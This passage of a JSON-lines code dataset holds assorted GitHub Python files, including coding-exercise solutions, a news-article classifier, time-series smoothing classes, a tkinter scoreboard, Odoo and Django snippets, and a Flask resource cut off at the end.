+{"seq_id":"12321616221","text":"# https://www.hackerrank.com/challenges/find-digits/problem\n# Find Digits\n# Calculate the number of digits in an integer that evenly divide it.\n\n#import math\n#import os\n#import random\n#import re\n#import sys\n\n#\n# Complete the 'findDigits' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER n as parameter.\n#\n\ndef findDigits(n):\n # Write your code here\n num = int(n);\n count = 0;\n while(num != 0):\n if(num % 10 == 0):\n num = num // 10;\n continue;\n if(n % (num % 10) == 0):\n count += 1;\n num = num // 10;\n return count;\n \n\nif __name__ == '__main__':\n #fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n result = findDigits(n)\n \n print(str(result));\n #fptr.write(str(result) + '\\n')\n\n #fptr.close()\n\n\n'''\nSample Input:\n2\n12\n1012\n\nSample Output:\n2\n3\n\n'''\n","repo_name":"MaxSoEn/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task-4/problem-5.py","file_name":"problem-5.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41437606048","text":"import lxml.html as html_parser\n\nimport config\nfrom .training import train\nimport nltk\nimport pickle\n\nNEWS_WORDS = [\n \"news\",\n \"breaking\",\n \"breaking news\",\n \"today\",\n \"yesterday\"\n \"this evening\",\n \"this afternoon\",\n \"happened\",\n \"why\",\n \"rescued\",\n \"player\", \"players\",\n \"announced\",\n \"известие\",\n \"разрывной\",\n \"последние новости\",\n \"сегодня\",\n \"вчера\",\n \"этот вечер\",\n \"сегодня днем\",\n \"произошедший\",\n \"зачем\",\n \"спасённый\",\n \"проигрыватель\", \"проигрыватели\",\n \"анонсированный\",\n]\n\nNOT_NEWS_WORDS = [\n \"top\",\n \"how to\",\n \"best\",\n \"gift\", \"gifts\",\n \"best\",\n \"your\",\n \"here are my\", \"here is my\",\n \"my favourite\",\n \"things\",\n \"most\",\n \"известие\",\n \"как\",\n \"лучший\",\n \"дар\", \"подарки\",\n \"лучший\",\n \"твой\",\n \"вот мой\", \"вот мой\",\n \"мой любимый\",\n \"вещи\",\n \"весьма\",\n]\n\n\ndef generate_parsed_file(filename, *args, **kwargs):\n # This is needed in multiprocessing functions\n return ParsedFile(filename, *args, **kwargs)\n\n\nclass ParsedFile:\n # Load the profiles\n _language_profiles = {}\n _cat_profiles = dict((l, dict()) for l in config.LANGUAGES)\n for lang in config.LANGUAGES:\n with open(config.PROFILE_DATA + '/' + lang + '.pickle', 'rb') as f:\n _language_profiles[lang] = pickle.load(f)\n\n for cat in config.CATEGORIES:\n with open(f\"{config.PROFILE_DATA}/{lang}_{cat}.pickle\", 'rb') as cf:\n _cat_profiles[lang][cat] = pickle.load(cf)\n\n def __init__(self, filename, pre_compute=()):\n self._filename = filename\n self.filename = self._filename.split('/')[-1]\n\n self.contents = None\n self.title = None\n\n self._article = None\n self._ngrams = None\n self._short_ngrams = None\n self._stopwords_ngrams = None\n self._lang = None\n self._category = None\n self._news_score = None\n\n # Open and parse the file\n with open(self._filename, 'r') as f:\n _raw_contents = f.read()\n _html_root = html_parser.fromstring(_raw_contents)\n _children = _html_root.getchildren()\n _, body = _children[0], _children[1]\n _article = body.getchildren()[0]\n self.title = _article.xpath('normalize-space(//h1)')\n self.contents = _article.text_content()\n words = len(_article.text_content().split())\n paragraphs = _article.findall(\"p\")\n links = 0\n for p in paragraphs:\n hrefs = len(p.findall(\"a\"))\n if hrefs > 0:\n links += hrefs\n figures = len(_article.findall(\"figure\"))\n self.ranking_score = (words // 10) + (figures * 3) + (links * 1.5)\n\n # Pre compute statements\n if 'lang' in pre_compute:\n self.lang()\n if 'category' in pre_compute:\n self.category()\n if 'news_score' in pre_compute:\n self.news_score()\n if 'short_ngrams' in pre_compute:\n self.short_ngrams()\n\n def lang(self):\n if self._lang is not None:\n return self._lang\n\n stopwords_ngrams = self.stopwords_ngrams()\n guesses = dict.fromkeys(config.LANGUAGES)\n for lang in guesses:\n guesses[lang] = nltk.jaccard_distance(stopwords_ngrams, ParsedFile._language_profiles[lang])\n best_guess = min(guesses, key=guesses.get)\n\n if guesses[best_guess] > config.LANGUAGE_MAX_DISTANCE:\n best_guess = \"other\"\n self._lang = best_guess\n return self._lang\n\n def category(self):\n if self._category is not None:\n return self._category\n if self.lang() not in config.LANGUAGES or not self.news_score():\n self._category = 0\n return self._category\n\n guesses = {c: 0 for c in config.CATEGORIES}\n iter_cat = iter(config.CATEGORIES)\n for category in ParsedFile._cat_profiles[self.lang()]:\n guesses[next(iter_cat)] = nltk.jaccard_distance(self.ngrams(), ParsedFile._cat_profiles[self.lang()][category])\n\n min_value = min(guesses, key=guesses.get)\n if guesses[min_value] > config.CATEGORIZATION_MAX_DISTANCE:\n self._category = \"other\"\n else:\n self._category = min_value\n return self._category\n\n def news_score(self):\n if self._news_score is not None:\n return self._news_score\n if self.lang() not in config.LANGUAGES:\n self._news_score = 0\n return self._news_score\n\n score = 0\n for word in self.title.split(' '):\n if word.lower() in NEWS_WORDS:\n score += 1.5\n if word.lower() in NOT_NEWS_WORDS:\n score -= 1\n self._news_score = score > -1\n return self._news_score\n\n def ngrams(self):\n if self._ngrams is not None:\n return self._ngrams\n\n self._ngrams = train.generate_ngrams(self.contents)\n return self._ngrams\n\n def short_ngrams(self):\n if self._short_ngrams is not None:\n return self._short_ngrams\n if self.lang() not in config.LANGUAGES or not self.news_score():\n self._short_ngrams = {}\n return self._short_ngrams\n\n ngram_string = self.title + ' '.join(self.contents.split()[:50])\n self._short_ngrams = train.generate_ngrams(ngram_string, 3)\n return self._short_ngrams\n\n def stopwords_ngrams(self):\n if self._stopwords_ngrams is not None:\n return self._stopwords_ngrams\n\n self._stopwords_ngrams = train.generate_ngrams(self.contents, maximum=1, only_stopwords=True)\n return self._stopwords_ngrams\n","repo_name":"MarcoBuster/data-clustering-contest","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"13594545737","text":"total = soma = maior = menor = 0\nrep = 'S'\nwhile rep in 'Ss':\n n = int(input('digite um número:'))\n rep = str(input('Deseja continuar [S/N]? ')).upper().strip()[0]\n menor = n\n total += 1\n soma += n\n if n > maior:\n maior = n\n if n <= menor:\n menor = n\nmedia = soma / total\nprint(f'''Você digitou {total} vezes, a soma entre os valores são {soma}\nA media ficou {media} e os maior número é {maior} e o menor número é {menor}.''')","repo_name":"Xaixen/Python3","sub_path":"Exercícios 1/maior e menores var.py","file_name":"maior e menores var.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2477485944","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\ndef get_coord(self, point_tags):\n \"\"\"Return the coordinates of point(s).\n\n Parameters\n ----------\n self : PointMat\n an PointMat object\n point_tags : np.array\n an array of point tags\n\n Returns\n -------\n coord: np.array\n an array of point coordinates\n\n \"\"\"\n\n nd_case = np.size(point_tags)\n coord = np.zeros((nd_case, 2))\n if nd_case == 1:\n coord = self.coordinate[point_tags, :]\n else:\n coord = self.coordinate[point_tags, :]\n\n if np.size(coord) == 0:\n return None\n else:\n return coord\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Mesh/PointMat/get_coord.py","file_name":"get_coord.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"25471081387","text":"import copy\nimport os\nimport sys\nimport json\nfrom db_accessing.VO import Album_VO, Album_recommend_VO\nfrom modules.natural_language.NL import NL_processor\nfrom modules.recommendation.similarity_functions import cosine_similarity\n\ndef make_user_interest_vector(user_interests, sample_dict):\n # unique_interests[i] 가 관심사 리스트에 존재한다면 i 번째 요소가 1이고, 존재하지 않으면 0인 벡터를 생성\n return [1 if interest in user_interests else 0\n for interest in sample_dict]\n\ndef merge_similarity():\n pass\n\n\nbatchsize = 200\nrecommend_size = 5\n\nlenOfNotNULL = Album_VO.query.filter(Album_VO.Description != None).count()\nprint(lenOfNotNULL, type(lenOfNotNULL))\n\n\n\n\n\n\nx = Album_VO.query.filter(Album_VO.Description != None).offset(210).limit(batchsize).all()\nfor seg in x:\n print(seg.Album_Title)\n# print(len(x), type(x))\n\nsim_best3 = []\nfor i in range(batchsize):\n print('outerloop count: ', i)\n NLP_noun_count_dict = NL_processor(x[i].Description).noun_count_result\n ht_list = list(NLP_noun_count_dict.keys())\n inner_sim_best3 = []\n for j in range(batchsize):\n\n if i != j:\n inner_ht_list = list(NL_processor(x[j].Description).noun_count_result.keys())\n\n dictionary_set = copy.deepcopy(ht_list)\n dictionary_set.extend(inner_ht_list)\n dictionary_set = list(set(dictionary_set))\n\n # print(\"dict_set : \", dictionary_set)\n\n\n IR_Vector_inner = make_user_interest_vector(inner_ht_list, dictionary_set)\n IR_Vector_outer = make_user_interest_vector(ht_list, dictionary_set)\n # print(IR_Vector_inner)\n # print(IR_Vector_outer)\n sim = cosine_similarity(IR_Vector_inner, IR_Vector_outer)\n # print(sim)\n\n if len(inner_sim_best3) == recommend_size:\n # print('if문', file=sys.stderr)\n for k in range(recommend_size):\n if inner_sim_best3[k][0] < sim:\n inner_sim_best3[k] = [sim, x[j]]\n inner_sim_best3.sort(key = lambda element : element[0])\n break\n # print(inner_sim_best3)\n else:\n # print('else 문', file=sys.stderr)\n inner_sim_best3.append([sim, x[j]])\n inner_sim_best3.sort(key = lambda element : element[0])\n # print(inner_sim_best3)\n\n sim_best3.append(inner_sim_best3)\n # print(inner_sim_best3, file=sys.stderr)\n\n\n\n# Json 파일로 결과 dict 를 저장\n\ndef recommended_list_to_json(rec_list):\n fname = '{0}/recommand_album_{1}.json'.format(dir, x[res_i].Album_ID)\n with open(fname, mode='w', encoding='utf8') as f:\n for dict_input in rec_list:\n json.dump(dict_input,fp=f, ensure_ascii=False)\n f.write('\\n')\n\nfor res_i in range(batchsize):\n print(x[res_i].Album_Title, \"'s recomend Album is : \\n\\t\")\n rec_list = []\n for i in range(len(sim_best3[res_i])):\n print(\">>> [{0}] {1} : {2} \\n\\t\".format(sim_best3[res_i][i][0], sim_best3[res_i][i][1].Album_ID, sim_best3[res_i][i][1].Album_Title, file=sys.stderr))\n dict_result = {\"ID\": sim_best3[res_i][i][1].Album_ID, \"Title\": sim_best3[res_i][i][1].Album_Title,\"similarity\": sim_best3[res_i][i][0]}\n rec_list.append(dict_result)\n recommended_list_to_json(rec_list)\n\n\n\ndef recommended_list_to_DB(AlbumRecommendVO):\n\n # 반드시 쌍따옴표...key\n str = u'{\"rec1\":123123,\"rec2\":33212,\"rec3\":313455}'\n dict1 = json.loads(str)\n print(dict1, type(dict1))","repo_name":"bitacademy-howl/Music_Recommendation_mod","sub_path":"test_module/reco_save_module.py","file_name":"reco_save_module.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43012662854","text":"import pandas as pd\nimport numpy as np\n\n\nclass AggregateData():\n \"\"\" This class compute the aggregation of a time series data by using a different methods, for a\n specific period of time. All of these methods work on a Pandas Series object.\n\n Args:\n -----\n\n interval (string) >>> Time interval which calculate the aggregate function.\n method (string) >>> It's possible to aggragate the data by mean, max, min and percentile. Default is mean\n percentile (int) >>> Optional. Percentile, integer number beetween 0 and 100. Default is 0.5 (median).\n \"\"\"\n\n def __init__(self, interval, method=\"mean\", percentile=50):\n\n methods_avaible = ['mean', 'max', 'min', 'percentile']\n\n if method not in methods_avaible:\n raise Exception('Invalid method')\n if percentile <= 0 or percentile >= 100:\n raise Exception('Invalid percentile')\n\n self.method = method\n self.interval = interval\n self.percentile = percentile / 100\n\n def meanAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the mean calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).mean()\n\n def maxAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the maximum calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).max()\n\n def minAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the mininum calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).min()\n\n def percentileAgg(self, data):\n \"\"\"\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the percentile calculated for the time interval specified\n \"\"\"\n\n return data.resample(self.interval).apply(lambda x: x.quantile(self.percentile))\n\n def fit(self, data):\n \"\"\" Methods used to apply a specific aggregation function to a pandas time series.\n\n Args:\n -----\n data (pandas.Series) >>> index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results of the specifc aggregation method invoke\n \"\"\"\n\n if self.method == \"mean\":\n return self.meanAgg(data)\n elif self.method == \"max\":\n return self.maxAgg(data)\n elif self.method == \"min\":\n return self.minAgg(data)\n elif self.method == \"percentile\":\n return self.percentileAgg(data)\n else:\n raise Exception(\"Invalid method\")\n\n\nclass MovingAverage():\n\n \"\"\" This class include a methods for the calculus of the moving average ('simple' and 'exponential') for a time series\n\n Args:\n -----\n method (string) >>> Method for the calculus of the moving average, it can be 'simple' or 'exponential'.\n Default is 'simple'.\n\n window_size (int) >>> Time window size. Default is equal to 2.\n \"\"\"\n\n def __init__(self, method=\"simple\", window_size=2):\n\n methods_avaible = ['simple', 'exponential']\n\n if method not in methods_avaible:\n raise Exception('Invalid method')\n if window_size <= 1:\n raise Exception('window_size too short')\n\n self.method = method\n self.window_size = window_size\n\n def simple(self, data):\n \"\"\" Computes moving average using discrete linear convolution of two one dimensional sequences.\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n return data.rolling(self.window_size).mean()\n\n def exponential(self, data):\n \"\"\" Computes exponential moving average\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n weights = np.exp(np.linspace(-1., 0., self.window_size))\n weights /= weights.sum()\n exp_ma = np.convolve(data, weights, mode='full')[:len(data)]\n exp_ma[:self.window_size] = np.NaN\n return pd.Series(data=exp_ma, index=data.index)\n\n def fit(self, data):\n \"\"\" Methods used to apply a specific moving average function to a pandas time series.\n\n Args:\n -----\n data >>> pandas Series. index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results of the specifc method invoke.\n \"\"\"\n\n if self.method == \"simple\":\n return self.simple(data)\n elif self.method == \"exponential\":\n return self.exponential(data)\n else:\n raise Exception(\"Invalid method\")\n\n\nclass SavGol_smoothing():\n \"\"\" This class include a methods for the calculus of the Savitzky-Golay filter\n\n Args:\n -----\n polyorder (int) >>> Order of the polynomial used for the interpolation. Default is 1.\n window_size (int) >>> Time window size. Default is equal to 2.\n deriv (int) >>> Order of the derivate. If greater than 0, the method return the series of the derivates.\n Default is 0.\n \"\"\"\n\n def __init__(self, polyorder=1, window_size=2, deriv=0):\n\n if window_size <= 1:\n raise Exception('window_size too short')\n\n self.polyorder = polyorder\n self.window_size = window_size\n self.deriv = deriv\n\n def sav_gol(self, data):\n \"\"\" Computes Sav-Gol smoothing filter\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n from scipy.signal import savgol_filter\n\n return pd.Series(data=savgol_filter(data, polyorder=self.polyorder,\n window_length=self.window_size,\n deriv=self.deriv),\n index=data.index)\n\n def fit(self, data):\n \"\"\" Methods used to apply the Sav-Gol filter function to a pandas time series.\n\n Args:\n -----\n data >>> pandas Series. index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results\n \"\"\"\n\n return self.sav_gol(data)\n","repo_name":"Tostox/mltools","sub_path":"mltools/timeSeriesTools/smoothingFilters.py","file_name":"smoothingFilters.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26526451737","text":"from django.test import TestCase\n\nfrom gcloud.tests import mock\nfrom gcloud.tests.mock import MagicMock\nfrom gcloud.utils.components import PluginServiceApiClient\nfrom gcloud.utils.components import get_remote_plugin_name\n\nGET_PAAS_PLUGIN_INFO = \"gcloud.utils.components.PluginServiceApiClient.get_paas_plugin_info\"\nTEST_RESULT = {\n \"result\": True,\n \"results\": [{\"code\": \"code1\", \"name\": \"name1\"}, {\"code\": \"code2\", \"name\": \"name2\"}],\n \"count\": 2,\n}\nTEST_LIMIT = 100\nTEST_OFFSET = 0\n\n\nclass TestGetRemotePluginName(TestCase):\n def test_call_success(self):\n with mock.patch(\"gcloud.utils.components.env.USE_PLUGIN_SERVICE\", \"1\"):\n with mock.patch(GET_PAAS_PLUGIN_INFO, MagicMock(return_value=TEST_RESULT)):\n plugin_info = get_remote_plugin_name(limit=TEST_LIMIT, offset=TEST_OFFSET)\n PluginServiceApiClient.get_paas_plugin_info.assert_called_once_with(\n search_term=None, environment=\"prod\", limit=TEST_LIMIT, offset=TEST_OFFSET\n )\n self.assertEqual(plugin_info, {\"code1\": \"name1\", \"code2\": \"name2\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/tests/utils/components/test_get_remote_plugin_name.py","file_name":"test_get_remote_plugin_name.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"6057609585","text":"# Classe para representar a tabela de candidatos\nclass Candidate:\n # Construtor da classe\n def __init__(self, id, CandidateName, MotherName, FatherName, Gender, CiviState, EducationLevel, Ethnicity, BirthDate,\n Nacionality, BirthCountry, BirthState, BirthCity, ShoeSize, PantsSize, ShirtSize, TelephoneNumber,\n SecondTelephoneNumber, Email, Cep, Country, State, City, Neighborhood, ResidencyType, Street, ResidencyNumber, Complement,\n RgNumber, RgEmissorCity, RgReleaseDate, Cpf, Pispasep, Function, Lodged,\n Pcd, RgFile, CpfFile, ResumeFile, CnhFile, ArmyFile, HasFriendFamiliar):\n self.id = id\n self.CandidateName = CandidateName\n self.MotherName = MotherName\n self.FatherName = FatherName\n self.Gender = Gender\n self.CiviState = CiviState\n self.EducationLevel = EducationLevel\n self.Ethnicity = Ethnicity\n self.BirthDate = BirthDate\n self.Nacionality = Nacionality\n self.BirthCountry = BirthCountry\n self.BirthState = BirthState\n self.BirthCity = BirthCity\n self.ShoeSize = ShoeSize\n self.PantsSize = PantsSize\n self.ShirtSize = ShirtSize\n self.TelephoneNumber = TelephoneNumber\n self.SecondTelephoneNumber = SecondTelephoneNumber\n self.Email = Email\n self.Cep = Cep\n self.Country = Country\n self.State = State\n self.City = City\n self.Neighborhood = Neighborhood\n self.ResidencyType = ResidencyType\n self.Street = Street\n self.ResidencyNumber = ResidencyNumber\n self.Complement = Complement\n self.RgNumber = RgNumber\n self.RgEmissorCity = RgEmissorCity\n self.RgReleaseDate = RgReleaseDate\n self.Cpf = Cpf\n self.Pispasep = Pispasep\n self.Function = Function\n self.Lodged = Lodged\n self.Pcd = Pcd\n self.RgFile = RgFile\n self.CpfFile = CpfFile\n self.ResumeFile = ResumeFile\n self.CnhFile = CnhFile\n self.ArmyFile = ArmyFile\n self.HasFriendFamiliar = HasFriendFamiliar\n \n # Retorna um dicionário com os dados da classe para facilitar a conversão para JSON\n def _dict_(self) -> dict:\n return {\n 'id': self.id,\n 'CandidateName': self.CandidateName,\n 'MotherName': self.MotherName,\n 'FatherName': self.FatherName,\n 'Gender': self.Gender,\n 'CiviState': self.CiviState,\n 'EducationLevel': self.EducationLevel,\n 'Ethnicity': self.Ethnicity,\n 'BirthDate': self.BirthDate,\n 'Nacionality': self.Nacionality,\n 'BirthCountry': self.BirthCountry,\n 'BirthState': self.BirthState,\n 'BirthCity': self.BirthCity,\n 'ShoeSize': self.ShoeSize,\n 'PantsSize': self.PantsSize,\n 'ShirtSize': self.ShirtSize,\n 'TelephoneNumber': self.TelephoneNumber,\n 'SecondTelephoneNumber': self.SecondTelephoneNumber,\n 'Email': self.Email,\n 'Cep': self.Cep,\n 'Country': self.Country,\n 'State': self.State,\n 'City': self.City,\n 'Neighborhood': self.Neighborhood,\n 'ResidencyType': self.ResidencyType,\n 'Street': self.Street,\n 'ResidencyNumber': self.ResidencyNumber,\n 'Complement': self.Complement,\n 'RgNumber': self.RgNumber,\n 'RgEmissorCity': self.RgEmissorCity,\n 'RgEmissorCity': self.RgEmissorCity,\n 'RgReleaseDate': self.RgReleaseDate,\n 'Cpf': self.Cpf,\n 'Pispasep': self.Pispasep,\n 'Function': self.Function,\n 'Lodged': self.Lodged,\n 'Pcd': self.Pcd,\n 'RgFile': self.RgFile,\n 'CpfFile': self.CpfFile,\n 'ResumeFile': self.ResumeFile,\n 'CnhFile': self.CnhFile,\n 'ArmyFile': self.ArmyFile,\n 'HasFriendFamiliar': self.HasFriendFamiliar\n }","repo_name":"GustavGomes/AlfaCoreDumped2023","sub_path":"model/candidatesModel.py","file_name":"candidatesModel.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25572456728","text":"import sys\r\n\r\ndef maxProfit(prices):\r\n profit = 0\r\n min_price = sys.maxsize # system상 가장 큰 값\r\n\r\n # 최댓값과 최솟값을 갱신\r\n for price in prices:\r\n min_price = min(min_price, price) # 원래 min_price와 price 중 작은 것\r\n profit = max(price - min_price, profit) # 원래 profit과 price에서 min_price중 큰 것\r\n\r\n return profit\r\n\r\nprint(maxProfit([7, 1, 5, 3, 6, 4]))","repo_name":"Park-Ji-Yoon/Algorithm","sub_path":"파이썬 알고리즘 인터뷰/chapter07/12_주식을 사고팔기 가장 좋은 시점_diff.py","file_name":"12_주식을 사고팔기 가장 좋은 시점_diff.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28497054279","text":"from tkinter import *\nfrom tkinter import ttk\n\n# PARTE GRAFICA\n\nroot = Tk()\nroot.title(\"Punteggi\")\nroot.geometry(\"+800+250\")\n\nfor i in range(1, 2):\n root.rowconfigure(i, weight=1)\nfor i in range(2):\n root.columnconfigure(i, weight=1)\n\n# PARTE DI ALGORITMO\n\n# Variabili\n\nplayersList = {}\n\nerrorMessage = StringVar()\nplayerVar = StringVar()\nscoreVar = StringVar()\nbestPlayers = [\"\"] * 3\nbestScores = [\"\"] * 3\nbestPlayersVar = StringVar(value=bestPlayers)\nbestScoresVar = StringVar(value=bestScores)\n\n\n# Inserimento dati\n\ndef submit(event):\n player = playerVar.get()\n score = scoreVar.get()\n\n playerClear = player.strip().replace(\" \", \"\")\n\n if playerClear.isalpha():\n try:\n playersList[player.strip()] = float(score)\n errorMessage.set(\"\")\n playerVar.set(\"\")\n scoreVar.set(\"\")\n\n bestPlayersList = sorted(playersList.items(), key=lambda item: item[1], reverse=True)\n\n # Creo le liste con i valori\n if len(bestPlayersList) <= 3:\n for index in range(len(bestPlayersList)):\n bestPlayers[index] = bestPlayersList[index][0]\n bestScores[index] = bestPlayersList[index][1]\n bestPlayersVar.set(bestPlayers)\n bestScoresVar.set(bestScores)\n else:\n for index in range(3):\n bestPlayers[index] = bestPlayersList[index][0]\n bestScores[index] = bestPlayersList[index][1]\n bestPlayersVar.set(bestPlayers)\n bestScoresVar.set(bestScores)\n\n\n except ValueError:\n errorMessage.set(\"Punteggio non valido\")\n\n elif player == \"\":\n errorMessage.set(\"Inserire i dati\")\n\n else:\n errorMessage.set(\"Nome non valido\")\n\n\n# PARTE GRAFICA\n\n# Primo frame\n\nbestPlayersNameFrame = ttk.Frame(root)\nbestPlayersNameFrame.grid(row=0, column=0, sticky=\"ne\", padx=10, pady=(20, 40))\n\nbestPlayersScoreFrame = ttk.Frame(root)\nbestPlayersScoreFrame.grid(row=0, column=1, sticky=\"nw\", padx=10, pady=(20, 40))\n\n# Frame nomi\n\nbestPlayersName = ttk.Label(bestPlayersNameFrame, text=\"Migliori giocatori:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersNameList = Listbox(bestPlayersNameFrame, listvariable=bestPlayersVar, height=3)\nbestPlayersNameList.grid(row=1, column=0, sticky=\"nw\")\n\n# Frame punteggi\n\nbestPlayersName = ttk.Label(bestPlayersScoreFrame, text=\"Migliori punteggi:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersScoreList = Listbox(bestPlayersScoreFrame, listvariable=bestScoresVar, height=3)\nbestPlayersScoreList.grid(row=1, column=0, sticky=\"nw\")\n\n# Secondo frame\n\ninputNameFrame = ttk.Frame(root)\ninputNameFrame.grid(row=1, column=0, sticky=\"se\", padx=10, pady=(0, 20))\n\ninputScoreFrame = ttk.Frame(root)\ninputScoreFrame.grid(row=1, column=1, sticky=\"sw\", padx=10, pady=(0, 20))\n\n# Frame input nomi\n\nbestPlayersName = ttk.Label(inputNameFrame, text=\"Inserisci giocatore:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersNameList = Entry(inputNameFrame, textvariable=playerVar)\nbestPlayersNameList.grid(row=1, column=0, sticky=\"nw\")\n\n# Frame input punteggi\n\nbestPlayersName = ttk.Label(inputScoreFrame, text=\"Inserisci punteggio:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersScoreList = Entry(inputScoreFrame, textvariable=scoreVar)\nbestPlayersScoreList.grid(row=1, column=0, sticky=\"nw\")\n\n# Terza riga\n\nerrorMessageLabel = ttk.Label(root, textvariable=errorMessage)\nerrorMessageLabel.grid(row=2, column=0, sticky=\"sw\", padx=10, pady=(0, 20))\n\nenterButton = ttk.Button(root, text=\"Insert\", command=lambda: submit(\"\"))\nenterButton.grid(row=2, column=1, sticky=\"se\", padx=10, pady=(0, 20))\n\nroot.bind(\"\", submit)\n\nroot.mainloop()\n","repo_name":"Samu-Amy/Poli-Info-Lab","sub_path":"Lab_3/Es5.py","file_name":"Es5.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30961086209","text":"def get_scores(goals1, goals2):\n team1_scores = 3 if goals1 > goals2 else 0 if goals1 < goals2 else 1\n team2_scores = 3 if goals2 > goals1 else 0 if goals2 < goals1 else 1\n return team1_scores, team2_scores\n\n\ndef table(scores):\n was_game = 1\n win = 1 if scores == 3 else 0\n draw = 1 if scores == 1 else 0\n lose = 1 if scores == 0 else 0\n return [was_game, win, draw, lose, scores]\n\n\nplays: int = int(input())\npivot_table: dict = {}\nfor i in range(plays):\n team1, goals1, team2, goals2 = input().split(';')\n teams: tuple = (team1, team2)\n scores: tuple = get_scores(int(goals1), int(goals2))\n for j in range(len(teams)):\n team_table: list = table(scores[j])\n if teams[j] not in pivot_table:\n pivot_table[teams[j]] = team_table\n else:\n old_table: list = pivot_table[teams[j]]\n pivot_table[teams[j]] = list(map(lambda a, b: a + b, team_table, old_table))\n\nfor team, table in pivot_table.items():\n print(team + ':', *table)\n","repo_name":"uheif/Stepik-Python_base","sub_path":"Lesson_3-7-1/task_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6326389116","text":"from odoo import models, fields, api, _\n\nclass SaleOrderInherit(models.Model):\n _inherit = 'sale.order'\n\n\n transfer_id= fields.Many2one('stock.picking', string='Add Transfer ID', help='When selected, the associated transfer lines are added to the Sale Order Line.')\n\n @api.onchange('transfer_id')\n def onchange_workorder_id(self):\n for rec in self:\n lines=[]\n for line in self.transfer_id.move_lines:\n vals = {\n 'product_id': line.product_id,\n 'name': line.product_id.name,\n 'product_uom_qty': line.product_uom_qty,\n 'product_uom': line.product_id.product_tmpl_id.uom_id,\n 'price_unit': line.product_id.product_tmpl_id.list_price\n # 'order_id': line.id\n # 'customer_lead': 0.0\n }\n lines.append((vals))\n rec.order_line = lines\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"darlamichhane/OdooModules","sub_path":"ab_global_autopoint/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16689027695","text":"import re\nstr1=input('Enter any string:')\nprint('You have entered \\''+str1+\"\\' String\")\ns1 = \"#Hello Abhilash Sharma is a good boy @viratkohli \"\ns2 = \"Abhi\"\n#print(len(s1))\n#for i in s1:\n# print(i)\n\nprint(s1[0])\ns2 = s1.find(s2)\nprint(s2)\n\nn = int(input())\nfor i in range(1,n+1):\n print(i,end=\"\")\n\ns3 = re.sub('[#@]', '', s1)\nprint(s3)","repo_name":"abhilash97sharma/python_codes","sub_path":"String_Operation.py","file_name":"String_Operation.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75255862568","text":"from flask_restful import Resource\nfrom flask import request, json\nfrom flask_jwt import jwt_required\n\nfrom repository.person_repository import PersonRepository\n\n\nclass PersonResource(Resource):\n\n repository = PersonRepository()\n\n @jwt_required()\n def post(self):\n data = request.get_json()\n person = 